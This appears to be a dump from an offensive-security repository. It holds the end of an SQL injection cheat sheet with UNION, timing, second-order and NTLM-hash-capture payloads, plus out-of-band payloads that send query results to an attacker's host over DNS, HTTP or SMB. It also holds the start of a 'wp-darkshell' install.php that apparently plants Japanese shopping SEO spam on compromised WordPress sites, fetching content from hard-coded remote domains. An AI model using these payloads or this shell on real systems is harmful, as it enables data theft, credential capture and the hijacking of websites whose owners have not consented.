600 | query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
601 | MySQL Load Data infile 
602 | By default it's not available !
603 | create table foo( line blob ); 
604 | load data infile 'c:/boot.ini' into table foo; 
605 | select * from foo;
606 | More Timing in MySQL
607 | select benchmark( 500000, sha1( 'test' ) );
608 | query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
609 | select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' ); 
610 | Enumeration data, Guessed Brute Force
611 | select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );
612 | Potentially Useful MySQL Functions
613 | 
614 | MD5() 
615 | MD5 Hashing
616 | SHA1() 
617 | SHA1 Hashing
618 | PASSWORD()
619 | ENCODE()
620 | COMPRESS() 
621 | Compress data, can be great in large binary reading in Blind SQL Injections.
622 | ROW_COUNT()
623 | SCHEMA()
624 | VERSION() 
625 | Same as @@version
626 | Second Order SQL Injections
627 | 
628 | Basically, you put an SQL Injection to some place and expect it's unfiltered in another action. This is common hidden layer problem.
629 | 
630 | Name : ' + (SELECT TOP 1 password FROM users ) + ' 
631 | Email : xx@xx.com
632 | 
633 | If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.
634 | 
635 | Forcing SQL Server to get NTLM Hashes
636 | 
637 | This attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain & Abel.
638 | 
639 | Bulk insert from a UNC Share (S) 
640 | bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
641 | 
642 | Check out Bulk Insert Reference to understand how can you use bulk insert.
643 | 
644 | Out of Band Channel Attacks
645 | 
646 | SQL Server
647 | 
648 | ?vulnerableParam=1; SELECT * FROM OPENROWSET('SQLOLEDB', ({INJECTION})+'.yourhost.com';'sa';'pwd', 'SELECT 1')
649 | Makes DNS resolution request to {INJECT}.yourhost.com
650 | 
651 | ?vulnerableParam=1; DECLARE @q varchar(1024); SET @q = '\\'+({INJECTION})+'.yourhost.com\\test.txt'; EXEC master..xp_dirtree @q
652 | Makes DNS resolution request to {INJECTION}.yourhost.com
653 | 
654 | {INJECTION} = You want to run the query.
655 | MySQL
656 | 
657 | ?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\'))) 
658 | Makes a NBNS query request/DNS resolution request to yourhost.com
659 | 
660 | ?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt')
661 | Writes data to your shared folder/file
662 | 
663 | {INJECTION} = You want to run the query.
664 | 
665 | Oracle
666 | 
667 | ?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ sniff.php?sniff='||({INJECTION})||'') FROM DUAL)
668 | Sniffer application will save results
669 | 
670 | ?vulnerableParam=(SELECT UTL_HTTP.REQUEST('http://host/ '||({INJECTION})||'.html') FROM DUAL)
671 | Results will be saved in HTTP access logs
672 | 
673 | ?vulnerableParam=(SELECT UTL_INADDR.get_host_addr(({INJECTION})||'.yourhost.com') FROM DUAL)
674 | You need to sniff dns resolution requests to yourhost.com
675 | 
676 | ?vulnerableParam=(SELECT SYS.DBMS_LDAP.INIT(({INJECTION})||'.yourhost.com',80) FROM DUAL)
677 | You need to sniff dns resolution requests to yourhost.com
678 | 
679 | {INJECTION} = You want to run the query.
680 | 
681 | 


--------------------------------------------------------------------------------
/shells/wp-darkshell/install.php:
--------------------------------------------------------------------------------
   1 | <?php 
   2 | @ini_set('display_errors', 0);@set_time_limit(3600);
   3 | define("DOMTXT","http://www.url2017.top/jp/");
   4 | define("GETDOM","http://www.host-3.xyz/buyma1qi_0/");
   5 | define("FNUM",50);
   6 | define("JGNUM","820");
   7 | define("LINKNUM","24");
   8 | define("BZSITE","u");
   9 | define("BZPRO","h");
  10 | //Fnamebg
  11 | define("FILEDIRNAME","discussion");
  12 | //Fnameend
  13 | 
  14 | 
  15 | 
  16 | 
  17 | 
  18 | 
  19 | 
  20 | 
  21 | 
  22 | 
  23 | 
  24 | 
  25 | 
  26 | 
  27 | 
  28 | 
  29 | 
  30 | 
  31 | //msbg
  32 | define("JDT","0");
  33 | //msend
  34 | //jthouzuibg
  35 | define("JTHZ",".xhtml");
  36 | //jthouzuiend
  37 | 
  38 | 
  39 | 
  40 | 
  41 | 
  42 | 
  43 | 
  44 | 
  45 | 
  46 | 
  47 | 
  48 | 
  49 | 
  50 | 
  51 | 
  52 | 
  53 | 
  54 | //keyjgbg
  55 | define("KEYJG","20");
  56 | //keyjgbgend
  57 | 
  58 | 
  59 | 
  60 | 
  61 | 
  62 | 
  63 | 
  64 | 
  65 | 
  66 | 
  67 | 
  68 | 
  69 | 
  70 | 
  71 | 
  72 | 
  73 | 
  74 | 
  75 | // #llqllq#arr_nametimebg
  76 | 
  77 | $arrnametime[]="2";
  78 | $arrnametime[]="3";
  79 | $arrnametime[]="1";
  80 | $arrnametime[]="4";
  81 | 
  82 | 
  83 | // #llqllq#arr_nametimeend
  84 | // #llqllq#arr_wordbg
  85 | 
  86 | $arr_word[0][] ="7";$arr_word[0][] ="6";$arr_word[0][] ="6";$arr_word[0][] ="8";$arr_word[0][] ="7";$arr_word[0][] ="4";$arr_word[0][] ="5";$arr_word[0][] ="5";$arr_word[0][] ="4";$arr_word[0][] ="8";$arr_word[1][] ="8";$arr_word[1][] ="4";$arr_word[1][] ="5";$arr_word[1][] ="7";$arr_word[1][] ="7";$arr_word[1][] ="8";$arr_word[1][] ="5";$arr_word[1][] ="6";$arr_word[1][] ="4";$arr_word[1][] ="6";$arr_word[2][] ="5";$arr_word[2][] ="7";$arr_word[2][] ="7";$arr_word[2][] ="4";$arr_word[2][] ="4";$arr_word[2][] ="8";$arr_word[2][] ="6";$arr_word[2][] ="6";$arr_word[2][] ="8";$arr_word[2][] ="5";$arr_word[3][] ="4";$arr_word[3][] ="7";$arr_word[3][] ="8";$arr_word[3][] ="4";$arr_word[3][] ="5";$arr_word[3][] ="5";$arr_word[3][] ="8";$arr_word[3][] ="6";$arr_word[3][] ="6";$arr_word[3][] ="7";$arr_word[4][] ="5";$arr_word[4][] ="6";$arr_word[4][] ="6";$arr_word[4][] ="5";$arr_word[4][] ="4";$arr_word[4][] ="7";$arr_word[4][] ="8";$arr_word[4][] ="7";$arr_word[4][] ="8";$arr_word[4][] ="4";$arr_word[5][] ="6";$arr_word[5][] ="4";$arr_word[5][] ="6";$arr_word[5][] ="7";$arr_word[5][] ="8";$arr_word[5][] ="5";$arr_word[5][] ="7";$arr_word[5][] ="4";$arr_word[5][] ="8";$arr_word[5][] ="5";$arr_word[6][] ="8";$arr_word[6][] ="6";$arr_word[6][] ="5";$arr_word[6][] ="6";$arr_word[6][] ="4";$arr_word[6][] ="7";$arr_word[6][] ="4";$arr_word[6][] ="8";$arr_word[6][] ="5";$arr_word[6][] ="7";$arr_word[7][] ="8";$arr_word[7][] ="5";$arr_word[7][] ="7";$arr_word[7][] ="5";$arr_word[7][] ="8";$arr_word[7][] ="4";$arr_word[7][] ="7";$arr_word[7][] ="4";$arr_word[7][] ="6";$arr_word[7][] ="6";$arr_word[8][] ="6";$arr_word[8][] ="4";$arr_word[8][] ="5";$arr_word[8][] ="4";$arr_word[8][] ="5";$arr_word[8][] ="6";$arr_word[8][] ="8";$arr_word[8][] ="7";$arr_word[8][] ="7";$arr_word[8][] ="8";$arr_word[9][] ="5";$arr_word[9][] ="7";$arr_word[9][] ="5";$arr_word[9][] ="4";$arr_word[9][] ="6";$arr_word[9][] ="6";$arr_word[9][] ="8";$arr_word[9][] ="4";$arr_word[9][] ="8";$arr_word[9][] ="7";$arr_word[10][] ="4";$arr_word[10][] ="5";$arr_word[10][] ="8";$arr_word[10][] ="4";$arr_word[10][] ="5";$arr_word[10][] ="7";$arr_word[10][] ="7";$arr_word[10][] ="6";$arr_word[10][] ="6";$arr_word[10][] ="8";$arr_word[11][] ="7";$arr_word[11][] ="5";$arr_word[11][] ="6";$arr_word[11][] ="7";$arr_word[11][] ="8";$arr_word[11][] ="8";$arr_word[11][] ="5";$arr_word[11][] ="6";$arr_word[11][] ="4";$arr_word[11][] ="4";
  87 | 
  88 | // #llqllq#arr_wordend
  89 | // #llqllq#arr_keywz
  90 | 
  91 | $arrKeywz[]="6";
  92 | $arrKeywz[]="8";
  93 | $arrKeywz[]="4";
  94 | $arrKeywz[]="10";
  95 | $arrKeywz[]="7";
  96 | $arrKeywz[]="5";
  97 | $arrKeywz[]="9";
  98 | $arrKeywz[]="11";
  99 | $arrKeywz[]="12";
 100 | 
 101 | 
 102 | // #llqllq#arr_keywzend
 103 | // #llqllq#arr_fuhao
 104 | $arrfh[]="、";$arrfh[]=" ";$arrfh[]="！";$arrfh[]="……";$arrfh[]="。";$arrfh[]="？";$arrfh[]="；";$arrfh[]="，";
 105 | // #llqllq#arr_fuhaoend
 106 | // #llqllq#arr_keybg
 107 | 
 108 | $arr_key[]="祝開店！大放出セール開催中";
 109 | $arr_key[]="【翌日発送可能】";
 110 | $arr_key[]="【激安大特価！】";
 111 | $arr_key[]="【希少！！】";
 112 | $arr_key[]="【セール 登場から人気沸騰】";
 113 | $arr_key[]="【人気商品！】";
 114 | $arr_key[]="上品";
 115 | $arr_key[]="【18％OFF】";
 116 | $arr_key[]="【メール便無料】";
 117 | $arr_key[]="★大人気商品★";
 118 | $arr_key[]="★日本の職人技★";
 119 | $arr_key[]="【受注生産品】";
 120 | $arr_key[]="『5年保証』";
 121 | $arr_key[]="当店在庫してます！";
 122 | $arr_key[]="【売り切り御免！】";
 123 | $arr_key[]="【日本産】";
 124 | $arr_key[]="【楽天最安値に挑戦】";
 125 | $arr_key[]="『4年保証』";
 126 | $arr_key[]="【国内配送】";
 127 | $arr_key[]="現品限り一斉値下げ！";
 128 | $arr_key[]="【大注目】";
 129 | $arr_key[]="【美品】";
 130 | $arr_key[]="配送員設置";
 131 | $arr_key[]="【あす楽対応】";
 132 | $arr_key[]="【高品質】";
 133 | $arr_key[]="ふるさと納税";
 134 | $arr_key[]="【感謝価格】";
 135 | $arr_key[]="【初売り】";
 136 | $arr_key[]="【最安値挑戦！】";
 137 | $arr_key[]="入荷中";
 138 | $arr_key[]="【正規品】";
 139 | $arr_key[]="【代引き不可】";
 140 | $arr_key[]="【新作入荷!!】";
 141 | $arr_key[]="超安い";
 142 | $arr_key[]="【送料込】";
 143 | $arr_key[]="【在庫あり/即出荷可】";
 144 | $arr_key[]="【超目玉】";
 145 | $arr_key[]="逆輸入";
 146 | $arr_key[]="【メーカー直送】";
 147 | $arr_key[]="【海外 正規品】";
 148 | $arr_key[]="【70％OFF】";
 149 | $arr_key[]="出産祝い";
 150 | $arr_key[]="【高い素材】";
 151 | $arr_key[]="★お求めやすく価格改定★";
 152 | $arr_key[]="【超お買い得！】";
 153 | $arr_key[]="【2015・新作】";
 154 | $arr_key[]="【オンラインショップ】";
 155 | $arr_key[]="日本製";
 156 | $arr_key[]="【送料無料/新品】";
 157 | $arr_key[]="予約販売";
 158 | $arr_key[]="【おトク】";
 159 | $arr_key[]="【メーカー公式ショップ】";
 160 | $arr_key[]="【当店限定販売】";
 161 | $arr_key[]="●日本正規品●";
 162 | $arr_key[]="再再販！";
 163 | $arr_key[]="玄関先迄納品";
 164 | $arr_key[]="【お買得！】";
 165 | $arr_key[]="【全商品オープニング価格 特別価格】";
 166 | $arr_key[]="【海外輸入】";
 167 | $arr_key[]="【在庫限り】";
 168 | $arr_key[]="【テレビで話題】";
 169 | $arr_key[]="【一部予約販売】";
 170 | $arr_key[]="交換無料！";
 171 | $arr_key[]="結婚祝い";
 172 | $arr_key[]="[宅送]";
 173 | $arr_key[]="【正規販売店】";
 174 | $arr_key[]="完売";
 175 | $arr_key[]="【ギフ_包装】";
 176 | $arr_key[]="【超ポイント祭?期間限定】";
 177 | $arr_key[]="【時間指定不可】";
 178 | $arr_key[]="【破格値下げ】";
 179 | $arr_key[]="【レビューを書けば送料当店負担】";
 180 | $arr_key[]="【送料無料】";
 181 | $arr_key[]="【新品】";
 182 | $arr_key[]="【正規品直輸入】";
 183 | $arr_key[]="【税込・送料無料】";
 184 | $arr_key[]="【楽ギフ_のし宛書】";
 185 | $arr_key[]="【はこぽす対応商品】";
 186 | $arr_key[]="【年中無休】";
 187 | $arr_key[]="【60％OFF】";
 188 | $arr_key[]="【ギフト】";
 189 | $arr_key[]="気質アップ";
 190 | $arr_key[]="新作からSALEアイテム等お得な商品満載";
 191 | $arr_key[]="【限定品】";
 192 | $arr_key[]="【激安セール】";
 193 | $arr_key[]="誠実";
 194 | $arr_key[]="【超目玉枠】";
 195 | $arr_key[]="【返品?交換対象商品】";
 196 | $arr_key[]="【T-ポイント5倍】";
 197 | $arr_key[]="【2015A/W新作★送料無料】";
 198 | $arr_key[]="【保障できる】";
 199 | $arr_key[]="【国際ブランド】";
 200 | $arr_key[]="即納！最大半額！";
 201 | $arr_key[]="【一部予約！】";
 202 | $arr_key[]="当店だけの限定モデル";
 203 | $arr_key[]="【即日発送】";
 204 | $arr_key[]="【お取り寄せ】";
 205 | $arr_key[]="【お気にいる】";
 206 | $arr_key[]="【期間限定お試し価格】";
 207 | $arr_key[]="【ご予約品】";
 208 | $arr_key[]="【正規取扱店】";
 209 | $arr_key[]="人気";
 210 | $arr_key[]="【メール便送料無料対応可】";
 211 | $arr_key[]="入園入学祝い";
 212 | $arr_key[]="【在庫処分】";
 213 | $arr_key[]="【即納】";
 214 | $arr_key[]="【ファッション通販】";
 215 | $arr_key[]="爆買い！";
 216 | $arr_key[]="【日本製】";
 217 | $arr_key[]="【最安値に挑戦】";
 218 | $arr_key[]="誕生日プレゼント";
 219 | $arr_key[]="【絶品】";
 220 | $arr_key[]="【大特価!!】";
 221 | $arr_key[]="【即出荷】";
 222 | $arr_key[]="【限定販売】";
 223 | $arr_key[]="【即発送可能】";
 224 | $arr_key[]="【予約中！】";
 225 | $arr_key[]="格安SALEスタート！";
 226 | $arr_key[]="【ふるさと割】";
 227 | $arr_key[]="(税込)";
 228 | $arr_key[]="【2016 新作】";
 229 | $arr_key[]="【35％OFF】";
 230 | $arr_key[]="【高価値】";
 231 | $arr_key[]="【祝開店！大放出セール開催中】";
 232 | $arr_key[]="【上品】";
 233 | $arr_key[]="【名入れ無料】";
 234 | $arr_key[]="定番";
 235 | $arr_key[]="【希望者のみラッピング無料】";
 236 | $arr_key[]="大特価!!";
 237 | $arr_key[]="【楽天ランキング1位】";
 238 | $arr_key[]="【在庫僅少】";
 239 | $arr_key[]="ランキング第1位";
 240 | $arr_key[]="【在庫一掃】";
 241 | $arr_key[]="【おすすめ】";
 242 | $arr_key[]="【コンビニ受取対応商品】";
 243 | $arr_key[]="驚きの価格が実現！";
 244 | $arr_key[]="【GINGER掲載商品】";
 245 | $arr_key[]="【公式】";
 246 | $arr_key[]="福袋";
 247 | $arr_key[]="【あすつく】";
 248 | $arr_key[]="【ネット限定】";
 249 | $arr_key[]="【2016春夏新作】";
 250 | $arr_key[]="【メーカー再生品】";
 251 | $arr_key[]="【SALE】";
 252 | $arr_key[]="【限定製作】";
 253 | $arr_key[]="『1年保証』";
 254 | $arr_key[]="【売れ筋】";
 255 | $arr_key[]="【お年玉セール特価】";
 256 | $arr_key[]="【史上最も激安】";
 257 | $arr_key[]="大注目";
 258 | $arr_key[]="【日本未発売】";
 259 | $arr_key[]="【お買得】";
 260 | $arr_key[]="【25％OFF】";
 261 | $arr_key[]="使い勝手の良い";
 262 | $arr_key[]="【楽ギフ_包装】";
 263 | $arr_key[]="【特別セール品】";
 264 | $arr_key[]="楽天";
 265 | $arr_key[]="【訳あり】";
 266 | $arr_key[]="【オンライン限定商品】";
 267 | $arr_key[]="超人気";
 268 | $arr_key[]="驚きの値段";
 269 | $arr_key[]="【限定価格セール！】";
 270 | $arr_key[]="【楽天スーパーセール】";
 271 | $arr_key[]="お気にいる";
 272 | $arr_key[]="【ラッピング不可】";
 273 | $arr_key[]="【再入荷！】";
 274 | $arr_key[]="【★安心の定価販売★】";
 275 | $arr_key[]="【信頼】";
 276 | $arr_key[]="【SEAL限定商品】";
 277 | $arr_key[]="爆売り！";
 278 | $arr_key[]="【 開梱 設置?無料 】";
 279 | $arr_key[]="【メーカー包装済】";
 280 | $arr_key[]="【新発売】";
 281 | $arr_key[]="【30％OFF】";
 282 | $arr_key[]="【誠実】";
 283 | $arr_key[]="【格安SALEスタート】";
 284 | $arr_key[]="オープニング 大放出セール";
 285 | $arr_key[]="オリジナル";
 286 | $arr_key[]="『3年保証』";
 287 | $arr_key[]="【爆売りセール開催中！】";
 288 | $arr_key[]="【人気商品】";
 289 | $arr_key[]="【高額売筋】";
 290 | $arr_key[]="最安値挑戦！";
 291 | $arr_key[]="直送商品";
 292 | $arr_key[]="驚きの値段で";
 293 | $arr_key[]="【10％OFF】";
 294 | $arr_key[]="オンラインショップ";
 295 | $arr_key[]="【海外限定】";
 296 | $arr_key[]="【NEW限定品】";
 297 | $arr_key[]="【数量限定】";
 298 | $arr_key[]="【お気に入り】";
 299 | $arr_key[]="【超特価SALE開催！】";
 300 | $arr_key[]="[定休日以外毎日出荷中]";
 301 | $arr_key[]="【お得】";
 302 | $arr_key[]="完成品";
 303 | $arr_key[]="【気質アップ】";
 304 | $arr_key[]="【現金特価】";
 305 | $arr_key[]="【福袋セール】";
 306 | $arr_key[]="【★超目玉】";
 307 | $arr_key[]="【在庫処分大特価!!】";
 308 | $arr_key[]="（訳ありセール 格安）";
 309 | $arr_key[]="【メール便不可】";
 310 | $arr_key[]="『2年保証』";
 311 | $arr_key[]="訳あり商品";
 312 | $arr_key[]="お歳暮";
 313 | $arr_key[]="【オープニング 大放出セール】";
 314 | $arr_key[]="【驚きの値段】";
 315 | $arr_key[]="【税込】";
 316 | $arr_key[]="【国際ブランド】";
 317 | $arr_key[]="【限定セール！】";
 318 | $arr_key[]="新作";
 319 | $arr_key[]="【保証書付】";
 320 | $arr_key[]="セール 登場から人気沸騰";
 321 | $arr_key[]="期間限定特別価格";
 322 | $arr_key[]="【予約販売】本";
 323 | $arr_key[]="【特価】";
 324 | $arr_key[]="【返品不可】";
 325 | $arr_key[]="【激安アウトレット!】";
 326 | $arr_key[]="史上最も激安";
 327 | $arr_key[]="【値下げ】";
 328 | $arr_key[]="【予約受付中】";
 329 | $arr_key[]="男女兼用";
 330 | $arr_key[]="【第1位獲得！】";
 331 | $arr_key[]="【未使用品】";
 332 | $arr_key[]="【在庫有】";
 333 | $arr_key[]="非売品";
 334 | $arr_key[]="【公式ショップ】";
 335 | $arr_key[]="開店記念セール！";
 336 | $arr_key[]="【2015秋冬新作】";
 337 | $arr_key[]="【予約】";
 338 | $arr_key[]="【ラッピング無料】";
 339 | $arr_key[]="【後払い手数料無料】";
 340 | $arr_key[]="【送料無料（一部地域を除く）】";
 341 | $arr_key[]="【驚きの値段で】";
 342 | $arr_key[]="超ポイントアップ祭";
 343 | $arr_key[]="スーパーセール期間限定";
 344 | $arr_key[]="【現品限り一斉値下げ！】";
 345 | $arr_key[]="【同梱不可】";
 346 | $arr_key[]="【国内正規総代理店アイテム】";
 347 | $arr_key[]="お気に入り";
 348 | $arr_key[]="【使い勝手の良い】";
 349 | $arr_key[]="【在庫あり】";
 350 | $arr_key[]="【クーポン対象外】";
 351 | $arr_key[]="【国内即発送】";
 352 | $arr_key[]="【2015年製 新品】";
 353 | $arr_key[]="感謝の声続々！";
 354 | $arr_key[]="【送料無料キャンペーン?】";
 355 | $arr_key[]="優先配送";
 356 | $arr_key[]="【本日特価】";
 357 | $arr_key[]="【国産】";
 358 | $arr_key[]="【当店一番人気】";
 359 | $arr_key[]="【超新作】";
 360 | $arr_key[]="【国内在庫】";
 361 | $arr_key[]="【中古】";
 362 | $arr_key[]="【１着でも送料無料】";
 363 | $arr_key[]="【数量は多】";
 364 | $arr_key[]="セットアップ";
 365 | $arr_key[]="全商品オープニング価格！";
 366 | $arr_key[]="希少 黒入荷！";
 367 | $arr_key[]="保障できる";
 368 | $arr_key[]="好きに";
 369 | $arr_key[]="【期間限定特価】";
 370 | $arr_key[]="【超歓迎された】";
 371 | $arr_key[]="高価値";
 372 | $arr_key[]="特別価格";
 373 | $arr_key[]="【代引可】";
 374 | $arr_key[]="お見舞い";
 375 | $arr_key[]="【5％OFF】";
 376 | $arr_key[]="【2015最新作】";
 377 | $arr_key[]="【返品送料無料】";
 378 | $arr_key[]="激安大特価！";
 379 | $arr_key[]="１着でも送料無料";
 380 | $arr_key[]="【超ポイントバック祭】";
 381 | $arr_key[]="【即納！最大半額！】";
 382 | $arr_key[]="お得セット";
 383 | $arr_key[]="宅配便配送";
 384 | $arr_key[]="【レビューで送料無料】";
 385 | $arr_key[]="【最安値挑戦】";
 386 | $arr_key[]="大量入荷";
 387 | $arr_key[]="名作";
 388 | $arr_key[]="【ギフト】";
 389 | $arr_key[]="早割クーポン！";
 390 | $arr_key[]="【残りわずか】";
 391 | $arr_key[]="激安";
 392 | $arr_key[]="品質検査済";
 393 | $arr_key[]="数量は多";
 394 | $arr_key[]="超歓迎された";
 395 | $arr_key[]="【国内正規品】";
 396 | $arr_key[]="【タイムセール！】";
 397 | $arr_key[]="【★大感謝セール】";
 398 | $arr_key[]="【全品送料無料】";
 399 | $arr_key[]="円高還元";
 400 | $arr_key[]="【内祝い】";
 401 | $arr_key[]="【WEB限定】";
 402 | $arr_key[]="【驚きの価格が実現！】";
 403 | $arr_key[]="正規品!";
 404 | $arr_key[]="【セール】";
 405 | $arr_key[]="【500円引きクーポン】";
 406 | $arr_key[]="おすすめ";
 407 | $arr_key[]="超特価SALE開催！";
 408 | $arr_key[]="数量限定価格!!";
 409 | $arr_key[]="通販";
 410 | $arr_key[]="海外並行輸入正規品";
 411 | $arr_key[]="【サイズ交換ＯＫ】";
 412 | $arr_key[]="【ポイント10倍】";
 413 | $arr_key[]="信頼";
 414 | $arr_key[]="【爆売り！】";
 415 | $arr_key[]="【通販 人気】";
 416 | $arr_key[]="【人気ショップが最安値挑戦！】";
 417 | $arr_key[]="代引き手数料無料";
 418 | $arr_key[]="【おしゃれ】";
 419 | $arr_key[]="【開店記念セール！】";
 420 | $arr_key[]="【おまけ付】";
 421 | $arr_key[]="【激安】";
 422 | $arr_key[]="【新品、本物、当店在庫だから安心】";
 423 | $arr_key[]="【待望★】";
 424 | $arr_key[]="訳あり";
 425 | $arr_key[]="【限定特価】";
 426 | $arr_key[]="【正規逆輸入品】";
 427 | $arr_key[]="限定価格セール！";
 428 | $arr_key[]="（お得な特別割引価格）";
 429 | $arr_key[]="日本限定";
 430 | $arr_key[]="【返品交換不可】";
 431 | $arr_key[]="【予約販売品】";
 432 | $arr_key[]="【ついに再販開始！】";
 433 | $arr_key[]="国産品";
 434 | $arr_key[]="高い素材";
 435 | $arr_key[]="【 新品 】";
 436 | $arr_key[]="【別倉庫からの配送】";
 437 | $arr_key[]="【着後レビューで 送料無料】";
 438 | $arr_key[]="贈り物";
 439 | $arr_key[]="【爆買い！】";
 440 | $arr_key[]="【メーカー直売】";
 441 | $arr_key[]="【まとめ買い】";
 442 | $arr_key[]="【超安い】";
 443 | $arr_key[]="開店祝い";
 444 | $arr_key[]="【年間ランキング6年連続受賞】";
 445 | $arr_key[]="【初回限定お試し価格】";
 446 | $arr_key[]="【楽天カード分割】";
 447 | $arr_key[]="【50％OFF】";
 448 | $arr_key[]="【半額】";
 449 | $arr_key[]="【新作からSALEアイテム等お得な商品満載】";
 450 | $arr_key[]="【お買い得！】";
 451 | $arr_key[]="【アウトレット☆送料無料】";
 452 | $arr_key[]="【期間限定送料無料】";
 453 | $arr_key[]="【スーパーセール】";
 454 | $arr_key[]="【初回限定】";
 455 | $arr_key[]="特価";
 456 | 
 457 | 
 458 | // #llqllq#arr_keyend
 459 | // #llqllq#randkeybg
 460 | $strRand[0]="vxbiczgaejtrlwdskyunqhopmf";
 461 | $strRand[1]="ezfdijqhunxkmgpsworcabvlty";
 462 | $strRand[2]="lizwhjmsrgcyvxuentobpkafdq";
 463 | $strRand[3]="iwsyljmkcndofbqhvpatexuzgr";
 464 | $strRand[4]="cgluyjqzekbftxdovprmahinsw";
 465 | $strRand[5]="hdixmebkqznfguasoljpvwrtcy";
 466 | $strRand[6]="rbiojywlgsnavhuzxdpkfqtmec";
 467 | $strRand[7]="azhvxpyetdgijfcuosnklwrqmb";
 468 | $strRand[8]="quhwaeskoprvtdbziycjgnfmxl";
 469 | $strRand[9]="laomjdcgipusfkhxbtwevqrzny";
 470 | $strRand[10]="irghpdyftnsavmqwbxoujzeckl";
 471 | $strRand[11]="nyopdksgrzubeivcjahmtqlfxw";
 472 | $strRand[12]="mfqpscjuxkatngyvwldorbehzi";
 473 | $strRand[13]="rumbnlktgoqxseyfciazwpjdvh";
 474 | $strRand[14]="xofmkzajnshluqywpbtevcirgd";
 475 | $strRand[15]="becfktsvwmxylohijzquarpdng";
 476 | $strRand[16]="xibymoaunstrfdkwvzghljqepc";
 477 | $strRand[17]="aklupoevdhqirzjfwsgycbxmnt";
 478 | $strRand[18]="kldhapbsrewtnmzjyvfuoqgcix";
 479 | $strRand[19]="bvgthjmnakwsceipqfyxlroudz";
 480 | $strRand[20]="ltnjgcvpsbxdyokefwruqahizm";
 481 | $strRand[21]="wobjzmflynsdktcearigqvhxup";
 482 | $strRand[22]="lqipyawdvfchntjbkugerxsomz";
 483 | $strRand[23]="seomjfzrigpnhvcqtbldkuywxa";
 484 | $strRand[24]="sclifujaoktzxwpnmqydvebrgh";
 485 | $strRand[25]="ekpvghfbaoxmlsnyctrjuqdiwz";
 486 | $strRand[26]="iczmvfyutlsxohwakenqdgrbjp";
 487 | $strRand[27]="tdvmlrufnxhijgwoaqszkbcpye";
 488 | $strRand[28]="vmrytlkxocgqjanuswzedfbihp";
 489 | $strRand[29]="xaqdocmkhrzvbpuwjyesngfilt";
 490 | $strRand[30]="afuzbrdlogjqtkenvmxwhyipsc";
 491 | $strRand[31]="pzjweyaxgkmondbftvrulchiqs";
 492 | $strRand[32]="fuckmsizptxvydljbgornwheqa";
 493 | $strRand[33]="lorhgpjvitunambcsqwzyekfdx";
 494 | $strRand[34]="qegiclrhnabxkyosdtvpfwzujm";
 495 | $strRand[35]="jfnaolbwvcrtpghzsqmeuyxkid";
 496 | $strRand[36]="ulvrjwzxpehngsadbtyqfmicok";
 497 | $strRand[37]="dgsxbthpojzenmrciluvaqwfky";
 498 | $strRand[38]="rktyojwqseadcbmgluxvpzhfin";
 499 | $strRand[39]="hrxdsmnetwgyiovpfcukljbzqa";
 500 | $strRand[40]="jguyxkhetznavprfdmciwqsbol";
 501 | $strRand[41]="neudslxvjfgaoczwhbpqkytimr";
 502 | $strRand[42]="txpcvbiuldkahnorzqefwjygms";
 503 | $strRand[43]="ouzflknpjacmrieqtdvygbsxhw";
 504 | $strRand[44]="uejnyptqlobfkrcsxhdvmazigw";
 505 | $strRand[45]="qgaflnypbmoiczrejtkvxduwsh";
 506 | $strRand[46]="urqcdvlpfihntsajxykwzbgeom";
 507 | $strRand[47]="bdqvjgxlmsetpaoiwhcfzyrukn";
 508 | $strRand[48]="nkebvsamgdhjzprxfotuwcyliq";
 509 | $strRand[49]="dahmoucrlsbxktpwiezyfqjvgn";
 510 | $strRand[50]="wcakfdvostlpiyugxbhjremqzn";
 511 | $strRand[51]="qpyvcnlgrekjdhwfmitoxbzusa";
 512 | $strRand[52]="lfkpixnmdvgjqyczhswbteaour";
 513 | $strRand[53]="suqecavhdjzrkofnxpbwmlygit";
 514 | $strRand[54]="quhfrkszcxpaotydwimbjgevnl";
 515 | $strRand[55]="fzludqjgsyeknxctohpambirvw";
 516 | $strRand[56]="gsxwdftijkpvurcnezohbaqlmy";
 517 | $strRand[57]="duaryizvkocswhqtjxpflnbmge";
 518 | $strRand[58]="gswbekovrtzqadpchnfxylijum";
 519 | $strRand[59]="lbsrjgvumqyedtwxpfhaknczio";
 520 | $strRand[60]="yngqtzaeiwhljkcupxdvmfbosr";
 521 | $strRand[61]="tdbjqwsgmypuoxckvhneifzalr";
 522 | $strRand[62]="jbwtemvngxyzafqudkrhosiplc";
 523 | $strRand[63]="wpxmdzclhfvbsntoyarqijegku";
 524 | $strRand[64]="ykceihmswdugnaprloxzvftjqb";
 525 | $strRand[65]="axcphmorwlfutsybidqgnzekvj";
 526 | $strRand[66]="zahtoijcqdvsurxpenmblfgwky";
 527 | $strRand[67]="bnxlvoirautfwgqcshmepzkdyj";
 528 | $strRand[68]="kbrlozighdfmpjawvcqeutsxyn";
 529 | $strRand[69]="cxdurfwtyaiqsoglzkjmnvpbhe";
 530 | $strRand[70]="bpxrauocjnqytmievgdflkshwz";
 531 | $strRand[71]="diysnfawlqkgmxopetucjzhvrb";
 532 | $strRand[72]="slafbyevomgqnhpirxztdjcukw";
 533 | $strRand[73]="wzhdivgmyjbekqnlrpfasxutco";
 534 | $strRand[74]="zvbtecmqioxuhpaljrsndgykwf";
 535 | $strRand[75]="veykclgxhpdmwnjziqabsrfuto";
 536 | $strRand[76]="vxlzqpkrunscyijtaewomdfhbg";
 537 | $strRand[77]="mniqhorybtejukfvlcszgadwxp";
 538 | $strRand[78]="whovbkyrpiuefngjldcaqzstxm";
 539 | $strRand[79]="ivranxekzwqsgpbmcoultfdjhy";
 540 | $strRand[80]="ytvkixchjedplnaszwfburqomg";
 541 | $strRand[81]="yisvxdqopczblgrmaknhetuwfj";
